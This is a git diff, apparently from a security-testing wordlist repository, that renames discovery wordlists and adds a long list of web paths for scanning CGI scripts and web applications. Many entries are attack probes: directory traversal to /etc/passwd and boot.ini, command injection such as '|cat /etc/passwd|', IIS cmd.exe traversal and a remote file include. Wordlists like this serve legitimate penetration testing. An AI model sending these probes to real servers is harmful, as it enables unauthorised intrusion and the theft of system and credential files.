diff --git a/Discovery/DNS/bitquark_subdomains_top100K.txt b/Discovery/DNS/bitquark-subdomains-top100K.txt
similarity index 100%
rename from Discovery/DNS/bitquark_subdomains_top100K.txt
rename to Discovery/DNS/bitquark-subdomains-top100K.txt
diff --git a/Discovery/DNS/deepmagic.com_top500prefixes.txt b/Discovery/DNS/deepmagic.com-top500prefixes.txt
similarity index 100%
rename from Discovery/DNS/deepmagic.com_top500prefixes.txt
rename to Discovery/DNS/deepmagic.com-top500prefixes.txt
diff --git a/Discovery/DNS/deepmagic.com_top50kprefixes.txt b/Discovery/DNS/deepmagic.com-top50kprefixes.txt
similarity index 100%
rename from Discovery/DNS/deepmagic.com_top50kprefixes.txt
rename to Discovery/DNS/deepmagic.com-top50kprefixes.txt
diff --git a/Discovery/DNS/fierce_hostlist.txt b/Discovery/DNS/fierce-hostlist.txt
similarity index 100%
rename from Discovery/DNS/fierce_hostlist.txt
rename to Discovery/DNS/fierce-hostlist.txt
diff --git a/Discovery/DNS/sorted_knock_dnsrecon_fierce_recon-ng.txt b/Discovery/DNS/sortedcombied-knock-dnsrecon-fierce-reconng.txt
similarity index 100%
rename from Discovery/DNS/sorted_knock_dnsrecon_fierce_recon-ng.txt
rename to Discovery/DNS/sortedcombied-knock-dnsrecon-fierce-reconng.txt
diff --git a/Discovery/Infrastructure/common_router_ips.txt b/Discovery/Infrastructure/common-router-ips.txt
similarity index 100%
rename from Discovery/Infrastructure/common_router_ips.txt
rename to Discovery/Infrastructure/common-router-ips.txt
diff --git a/Discovery/Infrastructure/nmap_top1000_ports.txt b/Discovery/Infrastructure/nmap-top1000-ports.txt
similarity index 100%
rename from Discovery/Infrastructure/nmap_top1000_ports.txt
rename to Discovery/Infrastructure/nmap-top1000-ports.txt
diff --git a/Discovery/SNMP/wordlist-common-snmp-community-strings.txt b/Discovery/SNMP/common-snmp-community-strings.txt
similarity index 100%
rename from Discovery/SNMP/wordlist-common-snmp-community-strings.txt
rename to Discovery/SNMP/common-snmp-community-strings.txt
diff --git a/Discovery/Web_Content/CGIs.txt b/Discovery/Web_Content/CGIs.txt
new file mode 100644
index 00000000..3d2f333c
--- /dev/null
+++ b/Discovery/Web_Content/CGIs.txt
@@ -0,0 +1,3388 @@
+TiVoConnect?Command=QueryServer
+TiVoConnect?Command=QueryContainer&Container=/&Recurse=Yes
+cgi-bin/cart32.exe
+cgi-bin/classified.cgi
+cgi-bin/download.cgi
+cgi-bin/flexform.cgi
+cgi-bin/flexform
+cgi-bin/lwgate.cgi
+cgi-bin/LWGate.cgi
+cgi-bin/lwgate
+cgi-bin/LWGate
+cgi-bin/perlshop.cgi
+cfappman/index.cfm
+cfdocs/examples/cvbeans/beaninfo.cfm
+cfdocs/examples/parks/detail.cfm
+kboard/
+lists/admin/
+splashAdmin.php
+ssdefs/
+sshome/
+tiki/
+tiki/tiki-install.php
+scripts/samples/details.idc
+_vti_bin/shtml.exe
+cgi-bin/handler.cgi
+cgi-bin/finger
+cgi-bin/finger.pl
+cgi-bin/formmail.cgi
+cgi-bin/formmail.pl
+cgi-bin/formmail
+cgi-bin/get32.exe
+cgi-bin/gm-authors.cgi
+cgi-bin/guestbook/passwd
+cgi-bin/horde/test.php?mode=phpinfo
+cgi-bin/photo/protected/manage.cgi
+cgi-bin/wrap.cgi
+./
+~root/
+cgi-bin/wrap
+forums/@ADMINconfig.php
+forums/config.php
+ganglia/
+guestbook/guestbookdat
+guestbook/pwd
+help/
+hola/admin/cms/htmltags.php?datei=./sec/data.php
+horde/imp/test.php
+horde/test.php?mode=phpinfo
+imp/horde/test.php?mode=phpinfo
+imp/horde/test.php
+index.html.bak
+index.html~
+index.php?chemin=..%2F..%2F..%2F..%2F..%2F..%2F..%2F%2Fetc
+global.inc
+cgi-bin/horde/test.php
+inc/common.load.php
+inc/config.php
+inc/dbase.php
+cgi-bin/visadmin.exe
+cgi-bin/html2chtml.cgi
+cgi-bin/html2wml.cgi
+cgi-bin/pollit/Poll_It_SSI_v2.0.cgi?data_dir=\etc\passwd%00
+cgi-bin/echo.bat?&dir+c:\
+cgi-bin/excite;IFS=\"$\";/bin/cat
+cgi-bin/ezshopper/loadpage.cgi?user_id=1&file=|cat%20/etc/passwd|
+cgi-bin/guestbook.cgi
+cgi-bin/guestbook.pl
+cgi-bin/ss
+forumdisplay.php?GLOBALS[]=1&f=2&comma=\".system('id').\"
+guestbook/guestbook.html
+html/cgi-bin/cgicso?query=AAA
+geeklog/users.php
+gb/index.php?login=true
+guestbook/admin.php
+cgi-bin/gH.cgi
+cgi-bin/gm-cplog.cgi
+getaccess
+help.html
+cgi-bin/gm.cgi
+filemanager/filemanager_forms.php
+cgi-bin/AT-admin.cgi
+cgi-bin/auth_data/auth_user_file.txt
+cgi-bin/awstats.pl
+cgi-bin/awstats/awstats.pl
+cgi-bin/blog/mt.cfg
+cgi-bin/cart.pl?db='
+cgi-bin/htsearch?config=foofighter&restrict=&exclude=&method=and&format=builtin-long&sort=score&words=
+cgi-bin/mt-static/mt-check.cgi
+cgi-bin/mt/mt-check.cgi
+cfdocs/expeval/openfile.cfm
+index.php/123
+mambo/index.php?Itemid=JUNK(5)
+profile.php?u=JUNK(8)
+ticket.php?id=99999
+vgn/login/1,501,,00.html?cookieName=x--\>
+a%5c.aspx
+cgi-bin/banner.cgi
+cgi-bin/bannereditor.cgi
+cgi-bin/book.cgi?action=default¤t=|cat%20/etc/passwd|&form_tid=996604045&prev=main.html&list_message_index=10
+admin/browse.asp?FilePath=c:\&Opt=2&level=0
+cgi-bin/architext_query.pl
+cgi-bin/bizdb1-search.cgi
+cgi-bin/blog/
+tsweb/
+cgi-bin/blog/mt-load.cgi
+cgi-bin/atk/javascript/class.atkdateattribute.js.php?config_atkroot=http://xxxxxxxxxx/
+vgn/performance/TMT
+vgn/performance/TMT/Report
+vgn/performance/TMT/Report/XML
+vgn/performance/TMT/reset
+vgn/ppstats
+vgn/previewer
+vgn/record/previewer
+vgn/stylepreviewer
+vgn/vr/Deleting
+vgn/vr/Editing
+vgn/vr/Saving
+vgn/vr/Select
+scripts/iisadmin/bdir.htr
+scripts/iisadmin/ism.dll
+scripts/tools/ctss.idc
+bigconf.cgi
+billing/billing.apw
+blah_badfile.shtml
+blah-whatever-badfile.jsp
+vgn/style
+scripts/no-such-file.pl
+SiteServer/Admin/commerce/foundation/domain.asp
+SiteServer/Admin/commerce/foundation/driver.asp
+SiteServer/Admin/commerce/foundation/DSN.asp
+SiteServer/admin/findvserver.asp
+SiteServer/Admin/knowledge/dsmgr/default.asp
+cgi-bin/cgiwrap/%3Cfont%20color=red%3E
+cgi-bin/moin.cgi?test
+autologon.html?10514
+basilix/mbox-list.php3
+basilix/message-read.php3
+clusterframe.jsp
+IlohaMail/blank.html
+bb-dnbd/faxsurvey
+cartcart.cgi
+scripts/Carello/Carello.dll
+scripts/tools/dsnform.exe
+scripts/tools/dsnform
+SiteServer/Admin/knowledge/dsmgr/users/GroupManager.asp
+SiteServer/Admin/knowledge/dsmgr/users/UserManager.asp
+prd.i/pgen/
+readme.eml
+scripts/httpodbc.dll
+scripts/proxy/w3proxy.dll
+scripts/root.exe?/c+dir+c:\+/OG
+SiteServer/admin/
+siteseed/
+scripts/samples/search/author.idq
+scripts/samples/search/filesize.idq
+scripts/samples/search/filetime.idq
+scripts/samples/search/queryhit.idq
+scripts/samples/search/simple.idq
+pccsmysqladm/incs/dbconnect.inc
+iisadmin/
+password.inc
+PDG_Cart/oder.log
+web-console/ServerInfo.jsp%00
+global.asa
+exchange/lib/AMPROPS.INC
+exchange/lib/DELETE.INC
+exchange/lib/GETREND.INC
+exchange/lib/GETWHEN.INC
+exchange/lib/JSATTACH.INC
+exchange/lib/JSROOT.INC
+exchange/lib/JSUTIL.INC
+exchange/lib/LANG.INC
+exchange/lib/logon.inc
+exchange/lib/PAGEUTIL.INC
+exchange/lib/PUBFLD.INC
+exchange/lib/RENDER.INC
+exchange/lib/SESSION.INC
+ows/restricted%2eshow
+WEB-INF./web.xml
+view_source.jsp
+w-agora/
+vider.php3
+exchange/root.asp?acs=anon
+officescan/cgi/cgiChkMasterPwd.exe
+%NETHOOD%/
+cgi-bin/astrocam.cgi
+cgi-bin/badmin.cgi
+cgi-bin/boozt/admin/index.cgi?section=5&input=1
+cgi-bin/ezadmin.cgi
+cgi-bin/ezboard.cgi
+cgi-bin/ezman.cgi
+cgi-bin/foxweb.dll
+cgi-bin/foxweb.exe
+cgi-bin/mgrqcgi
+cgi-bin/wconsole.dll
+cgi-bin/webplus.exe?about
+pbserver/pbserver.dll
+administrator/gallery/uploadimage.php
+pafiledb/includes/team/file.php
+phpEventCalendar/file_upload.php
+servlet/com.unify.servletexec.UploadServlet
+cgi-win/uploader.exe
+scripts/cpshost.dll
+scripts/repost.asp
+upload.asp
+uploadn.asp
+uploadx.asp
+wa.exe
+basilix/compose-attach.php3
+server/
+cgi-bin/fpsrvadm.exe
+siteminder/smadmin.html
+vgn/ac/data
+vgn/ac/delete
+vgn/ac/edit
+vgn/ac/esave
+vgn/ac/fsave
+vgn/ac/index
+vgn/asp/MetaDataUpdate
+vgn/asp/previewer
+vgn/asp/status
+vgn/asp/style
+vgn/errors
+vgn/jsp/controller
+vgn/jsp/errorpage
+vgn/jsp/initialize
+vgn/jsp/jspstatus
+vgn/jsp/jspstatus56
+vgn/jsp/metadataupdate
+vgn/jsp/previewer
+vgn/jsp/style
+vgn/legacy/edit
+vgn/login
+webtop/wdk/samples/index.jsp
+cgi-bin/.cobalt
+WEB-INF/web.xml
+forum/admin/wwforum.mdb
+fpdb/shop.mdb
+guestbook/admin/o12guest.mdb
+midicart.mdb
+MIDICART/midicart.mdb
+mpcsoftweb_guestbook/database/mpcsoftweb_guestdata.mdb
+news/news.mdb
+newuser?Image=../../database/rbsserv.mdb
+shopdbtest.asp
+shopping300.mdb
+shopping400.mdb
+shoppingdirectory/midicart.mdb
+SilverStream/Meta/Tables/?access-mode=text
+database/db2000.mdb
+cgi-bin/mailit.pl
+cgi-bin/search
+doc/webmin.config.notes
+error/HTTP_NOT_FOUND.html.var
+oem_webstage/cgi-bin/oemapp_cgi
+ADMINconfig.php
+cgi-bin/.access
+cgi-bin/%2e%2e/abyss.conf
+cgi-bin/data/fetch.php?page=
+cgi-bin/empower?DB=whateverwhatever
+cgi-bin/mrtg.cgi?cfg=blah
+cgi-bin/store/agora.cgi?page=whatever33.html
+?mod=node&nid=some_thing&op=view
+?mod=some_thing&op=browse
+article.php?article=4965&post=1111111111
+blah123.php
+categorie.php3?cid=june
+CFIDE/probe.cfm
+contents.php?new_language=elvish&mode=select
+download.php?op=viewdownload
+examples/basic/servlet/HelloServlet
+home.php?arsc_language=elvish
+hostadmin/?page='
+index.php?file=index.php
+jgb_eng_php3/cfooter.php3
+JUNK(5).csp
+modules.php?name=Downloads&d_op=viewdownload
+modules.php?op=modload&name=0&file=0
+modules.php?op=modload&name=Sections&file=index&req=viewarticle&artid=
+modules.php?op=modload&name=Web_Links&file=index&l_op=viewlink
+path/nw/article.php?id='
+pw/storemgr.pw
+rtm.log
+scozbook/view.php?PG=whatever
+servlet/com.livesoftware.jrun.plugins.ssi.SSIFilter
+shopa_sessionlist.asp
+simplebbs/users/users.php
+sips/sipssys/users/a/admin/user
+tcb/files/auth/r/root
+typo3conf/
+typo3conf/database.sql
+typo3conf/localconf.php
+vchat/msg.txt
+vgn/license
+web.config
+webamil/test.php?mode=phpinfo
+webcart-lite/config/import.txt
+webcart-lite/orders/import.txt
+webcart/carts/
+webcart/config/
+webcart/config/clients.txt
+webcart/orders/
+webcart/orders/import.txt
+webmail/horde/test.php
+whateverJUNK(4).html
+ws_ftp.ini
+WS_FTP.ini
+cgi-bin/MsmMask.exe
+_mem_bin/auoconfig.asp
+_mem_bin/remind.asp
+exchange/lib/ATTACH.INC
+SiteServer/Admin/knowledge/persmbr/vs.asp
+SiteServer/Admin/knowledge/persmbr/VsLsLpRd.asp
+SiteServer/Admin/knowledge/persmbr/VsPrAuoEd.asp
+SiteServer/Admin/knowledge/persmbr/VsTmPr.asp
+trace.axd
+tvcs/getservers.exe?action=selects1
+whatever.htr
+nsn/fdir.bas:ShowVolume
+nsn/fdir.bas
+servlet/webacc?User.html=noexist
+forum/admin/database/wwForum.mdb
+webmail/blank.html
+jamdb/
+cgi/cgiproc?
+cgi-bin/addbanner.cgi
+cgi-bin/af.cgi?_browser_out=.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2Fetc%2Fpasswd
+cgi-bin/alienform.cgi?_browser_out=.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2Fetc%2Fpasswd
+cgi-bin/shtml.dll
+admin-serv/tasks/configuration/ViewLog?file=passwd&num=5000&str=&directories=admin-serv%2Flogs%2f..%2f..%2f..%2f..%2f..%2f..%2fetc&id=admin-serv
+cgi-bin/aglimpse.cgi
+cgi-bin/aglimpse
+cgi-bin/architext_query.cgi
+cgi-local/cgiemail-1.4/cgicso?query=AAA
+cgi-local/cgiemail-1.6/cgicso?query=AAA
+servlet/SchedulerTransfer
+servlet/sunexamples.BBoardServlet
+servlets/SchedulerTransfer
+cgi-bin/cmd.exe?/c+dir
+cgi-bin/cmd1.exe?/c+dir
+cgi-bin/hello.bat?&dir+c:\
+cgi-bin/post32.exe|dir%20c:\
+perl/-e%20print%20Hello
+admin.cgi
+interscan/
+vgn/legacy/save
+IDSWebApp/IDSjsp/Login.jsp
+quikstore.cfg
+quikstore.cgi
+securecontrolpanel/
+siteminder
+webmail/
+Xcelerate/LoginPage.html
+_cti_pvt/
+smg_Smxcfg30.exe?vcc=3560121183d3
+examples/servlets/index.html
+nsn/..%5Cutil/attrib.bas
+nsn/..%5Cutil/chkvol.bas
+nsn/..%5Cutil/copy.bas
+nsn/..%5Cutil/del.bas
+nsn/..%5Cutil/dir.bas
+nsn/..%5Cutil/dsbrowse.bas
+nsn/..%5Cutil/glist.bas
+nsn/..%5Cutil/lancard.bas
+nsn/..%5Cutil/md.bas
+nsn/..%5Cutil/rd.bas
+nsn/..%5Cutil/ren.bas
+nsn/..%5Cutil/send.bas
+nsn/..%5Cutil/set.bas
+nsn/..%5Cutil/slist.bas
+nsn/..%5Cutil/type.bas
+nsn/..%5Cutil/userlist.bas
+nsn/..%5Cweb/env.bas
+nsn/..%5Cweb/fdir.bas
+nsn/..%5Cwebdemo/env.bas
+nsn/..%5Cwebdemo/fdir.bas
+wikihome/action/conflict.php
+cgi-bin/archie
+cgi-bin/calendar.pl
+cgi-bin/calendar
+cgi-bin/date
+cgi-bin/fortune
+cgi-bin/redirect
+cgi-bin/uptime
+cgi-bin/wais.pl
+/
+webtop/wdk/
+SilverStream
+signon
+upd/
+examples/jsp/source.jsp??
+lpt9
+cfcache.map
+cfdocs/cfcache.map
+CVS/Entries
+lpt9.xtp
+mysql/db_details_importdocsql.php?submit_show=true&do=import&docpath=../../../../../../../etc
+PHPMYADMINdb_details_importdocsql.php?submit_show=true&do=import&docpath=../../../../../../../etc
+asp/sqlqhit.asp
+asp/SQLQHit.asp
+iissamples/issamples/sqlqhit.asp
+iissamples/issamples/SQLQHit.asp
+ISSamples/sqlqhit.asp
+ISSamples/SQLQHit.asp
+junk.aspx
+oc/Search/sqlqhit.asp
+oc/Search/SQLQHit.asp
+search/htx/sqlqhit.asp
+search/htx/SQLQHit.asp
+search/sqlqhit.asp
+search/SQLQHit.asp
+sqlqhit.asp
+SQLQHit.asp
+cgi-bin/com5...................................................................................................................................................................................................
+cgi-bin/com5.java
+cgi-bin/com5.pl
+?Open
+?OpenServer
+catalog.nsf
+cersvr.nsf
+cgi-bin/testing_whatever
+domlog.nsf
+events4.nsf
+log.nsf
+names.nsf
+LOGIN.PWD
+USER/CONFIG.AP
+cgi-bin/mail
+cgi-bin/nph-error.pl
+cgi-bin/post-query
+cgi-bin/query
+cgi-bin/test-cgi.tcl
+cgi-bin/test-env
+.perf
+admin-serv/config/admpw
+test.php%20
+*.*
+cgi-bin/cgi_process
+ht_root/wwwroot/-/local/httpd$map.conf
+JUNK(10)
+local/httpd$map.conf
+tree
+cgi-bin/index.js0x70
+%00/
+%2e/
+%2f/
+%5c/
+index.jsp%00x
+weblogic
+%a%s%p%d
+index.html%20
+852566C90012664F
+hidden.nsf
+mail.box
+open?
+setup.nsf
+statrep.nsf
+webadmin.nsf
+cgi-bin/cgitest.exe
+examples/servlet/AUX
+cgi-bin/hpnst.exe?c=p+i=SrvSystemInfo.html
+cfdocs/cfmlsyntaxcheck.cfm
+Config1.htm
+contents/extensions/asp/1
+WebAdmin.dll?View=Logon
+cgi-bin/Pbcgi.exe
+cgi-bin/testcgi.exe
+cgi-win/cgitest.exe
+%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd
+c/winnt/system32/cmd.exe?/c+dir+/OG
+cgi-bin/snorkerz.bat
+cgi-bin/snorkerz.cmd
+msadc/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir+c:%5c
+msadc/samples/adctest.asp
+nikto.ida
+SUNWmc/htdocs/
+cgi-bin/webfind.exe?keywords=01234567890123456789
+cgi-shl/win-c-sample.exe
+examples/servlet/TroubleShooter
+cgi-bin/ans.pl?p=../../../../../usr/bin/id|&blah
+cgi-bin/ans/ans.pl?p=../../../../../usr/bin/id|&blah
+goform/CheckLogin?login=root&password=tslinux
+[SecCheck]/..%2f../ext.ini
+[SecCheck]/..%255c..%255c../ext.ini
+[SecCheck]/..%252f..%252f../ext.ini
+cgi/cfdocs/expeval/ExprCalc.cfm?OpenFilePath=c:\winnt\win.ini
+cgi/cfdocs/expeval/ExprCalc.cfm?OpenFilePath=c:\windows\win.ini
+.nsf/../winnt/win.ini
+prxdocs/misc/prxrch.idq?CiTemplate=../../../../../../../../../../winnt/win.ini
+query.idq?CiTemplate=../../../../../../../../../../winnt/win.ini
+iissamples/issamples/fastq.idq?CiTemplate=../../../../../../../../../../winnt/win.ini
+iissamples/issamples/query.idq?CiTemplate=../../../../../../../../../../winnt/win.ini
+default.htm%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%
+................../config.sys
+cfdocs/exampleapp/email/getfile.cfm?filename=c:\boot.ini
+cfdocs/exampleapp/docs/sourcewindow.cfm?Template=c:\boot.ini
+cfdocs/expeval/exprcalc.cfm?OpenFilePath=c:\boot.ini
+netget?sid=user&msg=300&file=../../../../../../../../../boot.ini
+netget?sid=user&msg=300&file=../../../../../../../../../../etc/passwd
+php/php.exe?c:\winnt\boot.ini
+phpping/index.php?pingto=www.test.com%20|%20dir%20c:\
+scripts/db4web_c.exe/dbdirname/c%3A%5Cboot.ini
+us/cgi-bin/sewse.exe?d:/internet/sites/us/sewse/jabber/comment2.jse+c:\boot.ini
+wx/s.dll?d=/boot.ini
+cgi-bin/Album?mode=album&album=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc&dispsize=640&start=0
+%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f../boot.ini
+servlet/webacc?User.html=../../../../../../../../../../../../../../../../../../boot.ini%00
+cgi-bin/SQLServ/sqlbrowse.asp?filepath=c:\&Opt=3
+cgi-bin/stats/statsbrowse.asp?filepath=c:\&Opt=3
+cgi-bin/test.bat?|dir%20..\\..\\..\\..\\..\\..\\..\\..\\..\\
+cgi-bin/tst.bat|dir%20..\\..\\..\\..\\..\\..\\..\\..\\,
+cgi-bin/input.bat?|dir%20..\\..\\..\\..\\..\\..\\..\\..\\..\\
+cgi-bin/input2.bat?|dir%20..\\..\\..\\..\\..\\..\\..\\..\\..\\
+ssi/envout.bat?|dir%20..\\..\\..\\..\\..\\..\\..\\
+php/php.exe?c:\boot.ini
+../../../../../../../../../boot.ini
+../../../../winnt/repair/sam._
+..\\..\\..\\..\\..\\..\\..\\boot.ini
+//etc/passwd
+//etc/hosts
+///./../.../boot.ini
+.cobalt/sysManage/../admin/.htaccess
+albums/userpics/Copperminer.jpg.php?cat%20/etc/passwd
+autohtml.php?op=modload&mainfile=x&name=/etc/passwd
+atomicboard/index.php?location=../../../../../../../../../../etc/passwd
+current/modules.php?mod=fm&file=../../../../../../../../../../etc/passwd%00&bn=fm_d1
+current/index.php?site=demos&bn=../../../../../../../../../../etc/passwd%00
+dev/translations.php?ONLY=%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd%00
+DomainFiles/*//../../../../../../../../../../etc/passwd
+docs/showtemp.cfm?TYPE=JPEG&FILE=c:\boot.ini
+ezhttpbench.php?AnalyseSite=/etc/passwd&NumLoops=1
+index.php?download=/winnt/win.ini
+index.php?download=/windows/win.ini
+index.php?download=/etc/passwd
+index.php?|=../../../../../../../../../etc/passwd
+index.php?page=../../../../../../../../../../etc/passwd
+index.php?page=../../../../../../../../../../boot.ini
+index.php?l=forum/view.php&topic=../../../../../../../../../etc/passwd
+jsp/jspsamp/jspexamples/viewsource.jsp?source=../../../../../../../../../../etc/passwd
+jsp/jspsamp/jspexamples/viewsource.jsp?source=../../../../../../../../../../boot.ini
+k/home?dir=/&file=../../../../../../../../etc/passwd&lang=kor
+nph-showlogs.pl?files=../../../../../../../../etc/passwd&filter=.*&submit=Go&linecnt=500&refresh=0
+nph-showlogs.pl?files=../../../../../../../../etc/&filter=.*&submit=Go&linecnt=500&refresh=0
+phprocketaddin/?page=../../../../../../../../../../boot.ini
+phpwebfilemgr/index.php?f=../../../../../../../../../etc/passwd
+phpwebfilemgr/index.php?f=../../../../../../../../../etc
+phptonuke.php?filnavn=/etc/passwd
+put/cgi-bin/putport.exe?SWAP&BOM&OP=none&Lang=en-US&PutHtml=../../../../../../../../etc/passwd
+ROADS/cgi-bin/search.pl?form=../../../../../../../../../../etc/passwd%00
+support/common.php?f=0&ForumLang=../../../../../../../../../../etc/passwd
+viewpage.php?file=/etc/passwd
+Web_Store/web_store.cgi?page=../../../../../../../../../../etc/passwd%00.html
+webMathematica/MSP?MSPStoreID=..\..\..\..\..\..\..\..\..\..\boot.ini&MSPStoreType=image/gif
+webMathematica/MSP?MSPStoreID=../../../../../../../../../../etc/passwd&MSPStoreType=image/gif
+cgi-bin/admin.cgi?list=../../../../../../../../../../etc/passwd
+cgi-bin/14all.cgi?cfg=../../../../../../../../etc/passwd
+cgi-bin/14all-1.1.cgi?cfg=../../../../../../../../etc/passwd
+cgi-bin/anacondaclip.pl?template=../../../../../../../../../../etc/passwd
+cgi-bin/auktion.cgi?menue=../../../../../../../../../../etc/passwd
+cgi-bin/bigconf.cgi?command=view_textfile&file=/etc/passwd&filters=
+cgi-bin/bb-hostsvc.sh?HOSTSVC=../../../../../../../../../../etc/passwd
+cgi-bin/bb-hist?HISTFILE=../../../../../../../../../../etc/passwd
+cgi-bin/bb-hist.sh?HISTFILE=../../../../../../../../../../etc/passwd
+cgi-bin/common.php?f=0&ForumLang=../../../../../../../../../../etc/passwd
+cgi-bin/commerce.cgi?page=../../../../../../../../../../etc/passwd%00index.html
+cgi-bin/cgiforum.pl?thesection=../../../../../../../../../../etc/passwd%00
+cgi-bin/cal_make.pl?p0=../../../../../../../../../../etc/passwd%00
+cgi-bin/db4web_c/dbdirname//etc/passwd
+cgi-bin/directorypro.cgi?want=showcat&show=../../../../../../../../../../etc/passwd%00
+cgi-bin/emumail/emumail.cgi?type=/../../../../../../../../../../../../../../../../etc/passwd%00
+cgi-bin/emumail.cgi?type=/../../../../../../../../../../../../../../../../etc/passwd%00
+cgi-bin/emu/html/emumail.cgi?type=/../../../../../../../../../../../../../../../../etc/passwd%00
+cgi-bin/faxsurvey?cat%20/etc/passwd
+cgi-bin/faqmanager.cgi?toc=/etc/passwd%00
+cgi-bin/ezshopper/search.cgi?user_id=id&database=dbase1.exm&template=../../../../../../../etc/passwd&distinct=1
+cgi-bin/formmail?recipient=root@localhost%0Acat%20/etc/passwd&email=joeuser@localhost&subject=test
+cgi-bin/formmail.pl?recipient=root@localhost%0Acat%20/etc/passwd&email=joeuser@localhost&subject=test
+cgi-bin/generate.cgi?content=../../../../../../../../../../winnt/win.ini%00board=board_1
+cgi-bin/generate.cgi?content=../../../../../../../../../../windows/win.ini%00board=board_1
+cgi-bin/generate.cgi?content=../../../../../../../../../../etc/passwd%00board=board_1
+cgi-bin/htmlscript?../../../../../../../../../../etc/passwd
+cgi-bin/htgrep?file=index.html&hdr=/etc/passwd
+cgi-bin/hsx.cgi?show=../../../../../../../../../../../etc/passwd%00
+cgi-bin/sewse?/home/httpd/html/sewse/jabber/comment2.jse+/etc/passwd
+cgi-bin/sbcgi/sitebuilder.cgi
+cgi-bin/mrtg.cgi?cfg=../../../../../../../../etc/passwd
+cgi-bin/mrtg.cfg?cfg=../../../../../../../../etc/passwd
+cgi-bin/main.cgi?board=FREE_BOARD&command=down_load&filename=../../../../../../../../../../etc/passwd
+cgi-bin/mail/nph-mr.cgi?do=loginhelp&configLanguage=../../../../../../../etc/passwd%00
+cgi-bin/mail/emumail.cgi?type=/../../../../../../../../../../../../../../../../etc/passwd%00
+cgi-bin/loadpage.cgi?user_id=1&file=..\\..\\..\\..\\..\\..\\..\\..\\winnt\\win.ini
+cgi-bin/loadpage.cgi?user_id=1&file=../../../../../../../../../../etc/passwd
+cgi-bin/htsearch?exclude=%60/etc/passwd%60
+cgi-bin/shop.cgi?page=../../../../../../../etc/passwd
+cgi-bin/sendtemp.pl?templ=../../../../../../../../../../etc/passwd
+cgi-bin/search/search.cgi?keys=*&prc=any&catigory=../../../../../../../../../../../../etc
+cgi-bin/search.pl?form=../../../../../../../../../../etc/passwd%00
+cgi-bin/search.cgi?..\\..\\..\\..\\..\\..\\..\\..\\..\\winnt\\win.ini
+cgi-bin/search.cgi?..\\..\\..\\..\\..\\..\\..\\..\\..\\windows\\win.ini
+cgi-bin/quickstore.cgi?page=../../../../../../../../../../etc/passwd%00html&cart_id=
+cgi-bin/publisher/search.cgi?dir=jobs&template=;cat%20/etc/passwd|&output_number=10
+cgi-bin/php.cgi?/etc/passwd
+cgi-bin/pals-cgi?palsAction=restart&documentName=/etc/passwd
+cgi-bin/opendir.php?/etc/passwd
+cgi-bin/nph-emumail.cgi?type=/../../../../../../../../../../../../../../../../etc/passwd%00
+cgi-bin/newsdesk.cgi?t=../../../../../../../../../../etc/passwd
+cgi-bin/netauth.cgi?cmd=show&page=../../../../../../../../../../etc/passwd
+cgi-bin/multihtml.pl?multi=/etc/passwd%00html
+cgi-bin/webdist.cgi?distloc=;cat%20/etc/passwd
+cgi-bin/way-board/way-board.cgi?db=/etc/passwd%00
+cgi-bin/way-board.cgi?db=/etc/passwd%00
+cgi-bin/view_item?HTML_FILE=../../../../../../../../../../etc/passwd%00
+cgi-bin/viewsource?/etc/passwd
+cgi-bin/ttawebtop.cgi/?action=start&pg=../../../../../../../../../../etc/passwd
+cgi-bin/traffic.cgi?cfg=../../../../../../../../etc/passwd
+cgi-bin/technote/main.cgi?board=FREE_BOARD&command=down_load&filename=/../../../../../../../../../../etc/passwd
+cgi-bin/talkback.cgi?article=../../../../../../../../etc/passwd%00&action=view&matchview=1
+cgi-bin/story/story.pl?next=../../../../../../../../../../etc/passwd%00
+cgi-bin/story.pl?next=../../../../../../../../../../etc/passwd%00
+cgi-bin/store/index.cgi?page=../../../../../../../../etc/passwd
+cgi-bin/store.cgi?StartID=../../../../../../../../../../etc/passwd%00.html
+cgi-bin/ssi//%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd
+cgi-bin/sojourn.cgi?cat=../../../../../../../../../../etc/password%00
+cgi-bin/simple/view_page?mv_arg=|cat%20/etc/passwd|
+cgi-bin/shopper.cgi?newpage=../../../../../../../../../../etc/passwd
+servlet/webacc?User.html=../../../../../../../../../../../../../../../../../../etc/passwd%00
+webcalendar/forum.php?user_inc=../../../../../../../../../../etc/passwd
+logbook.pl?file=../../../../../../../bin/cat%20/etc/passwd%00|
+cgi-bin/sawmill5?rfcf+%22/etc/passwd%22+spbn+1,1,21,1,1,1,1
+page.cgi?../../../../../../../../../../etc/passwd
+edittag/edittag.cgi?file=%2F..%2F..%2F..%2F..%2F..%2Fetc/passwd
+base/webmail/readmsg.php?mailbox=../../../../../../../../../../../../../../etc/passwd&id=1
+cgi-bin/zml.cgi?file=../../../../../../../../../../etc/passwd%00
+cgi-bin/YaBB.pl?board=news&action=display&num=../../../../../../../../../../etc/passwd%00
+cgi-bin/whois_raw.cgi?fqdn=%0Acat%20/etc/passwd
+cgi-bin/whois/whois.cgi?lookup=;&ext=/bin/cat%20/etc/passwd
+cgi-bin/whois.cgi?lookup=;&ext=/bin/cat%20/etc/passwd
+cgi-bin/webspirs.cgi?sp.nextform=../../../../../../../../../../etc/passwd
+cgi-bin/webplus?script=../../../../../../../../../../etc/passwd
+cgi-bin/webmail/html/emumail.cgi?type=/../../../../../../../../../../../../../../../../etc/passwd%00
+athenareg.php?pass=%20;cat%20/etc/passwd
+PSUser/PSCOErrPage.htm?errPagePath=/etc/passwd
+search?NS-query-pat=../../../../../../../../../../etc/passwd
+search?NS-query-pat=..\..\..\..\..\..\..\..\..\..\boot.ini
+..\..\..\..\..\..\temp\temp.class
+../../../../../../../../../../etc/passwd
+.../.../.../.../.../.../.../.../.../boot.ini
+................../etc/passwd
+%3f.jsp
+%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/windows/win.ini
